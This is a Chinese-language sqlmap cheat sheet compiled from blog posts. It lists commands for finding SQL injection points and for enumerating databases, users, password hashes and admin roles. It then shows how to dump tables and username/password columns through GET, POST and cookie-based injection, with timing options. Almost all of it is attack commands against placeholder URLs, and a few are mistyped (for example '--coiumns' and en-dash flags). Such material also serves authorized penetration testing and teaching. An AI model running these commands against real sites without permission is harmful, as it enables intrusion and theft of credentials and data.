1、快捷方式的建立
From:https://blog.csdn.net/oxygensss/article/details/110311403
python sqlmap.py
2、常用命令
From:
https://blog.csdn.net/smli_ng/article/details/106026901
https://blog.csdn.net/xmd213131/article/details/105919380
http://config.net.cn/producttest/3f96a311-9b37-43bc-83a6-4ca6565c3ffb-p1.html
sqlmap -u url --users :查看数据库所有用户
//cmd中命令用法: python sqlmap.py -u "http://site.com/login?u=test&p=123456"
sqlmap -u url --passwords :查看数据库所有用户密码
sqlmap -u url :判断注入点
sqlmap -u url --current-dbs :查看当前所有数据库
sqlmap -u url --current-user :查看数据库当前的用户
sqlmap -u url --is-dba :判断当前用户是否有管理员权限
sqlmap -u url --roles :列出数据库所有管理员角色
sqlmap -u url --current-db :查看当前数据库
sqlmap -u url -D 库名 --tables :爆表
sqlmap -u url -D 库名 -T 表明 --columns :爆字段
sqlmap -u url -D 库名 -T 表明 --C 字段名1,字段名2 --dump :爆数据
sqlmap -u url -D 库名 --dump-all :爆出数据库中所有数据
(1)get方法
URL后需要带参数
注入点判断
-u url
爆出数据库名
-u url --dbs
爆出数据库的表名
-u url -D 数据库 --tables
爆出数据库的列名
-u url -D 数据库 -T 表名 --columns
得到列中的数据
-u -D 数据库 -T 表名 -C 列名 --dump
(2)post方法
需要用--data=参数
-u URL --data="id=1"
使用burp抓包,请求内容保存在txt文件中

检测是否存在注入点
-r 文档位置
爆库名
-r 文档位置 --dbs
(3)cookies注入
默认情况下SQLMAP只支持GET/POST参数的注入测试,
–level参数且数值>=2的时候检查cookie里面的参数,
大于等于3时检查User-agent和Referer。
可以通过burpsuite等工具获取当前的cookie值,然后进行注入:
sqlmap.py -u "http://site.com/base.PHP"–cookies "id=1" –dbs –level 2
sqlmap.py -u 注入点URL --cookie"id=xx" --level 3
sqlmap.py -u url --cookie "id=xx"--level 3 --tables(猜表名)
sqlmap.py -u url --cookie "id=xx"--level 3 -T 表名 --coiumns
sqlmap.py -u url --cookie "id=xx"--level 3 -T 表名 -C username,password --dump
(4)延时注入
sqlmap –dbs -u"url" –delay 0.5 :延时0.5秒
sqlmap –dbs -u"url" –safe-freq :请求2次
(5)指定注入点
在指定注入的位置后加上*